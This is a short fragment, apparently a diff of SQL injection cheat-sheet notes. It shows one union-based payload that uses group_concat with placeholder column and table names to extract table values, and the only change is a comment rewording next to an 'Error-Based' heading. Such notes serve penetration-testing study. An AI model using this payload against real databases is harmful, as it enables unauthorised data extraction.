SQL Injection

 0 UNION SELECT 1,2,group_concat($value1,$value2) FROM $tablefound

-#Obtain values from the table we needed
+#Obtain the values from the table we needed

 Error-Based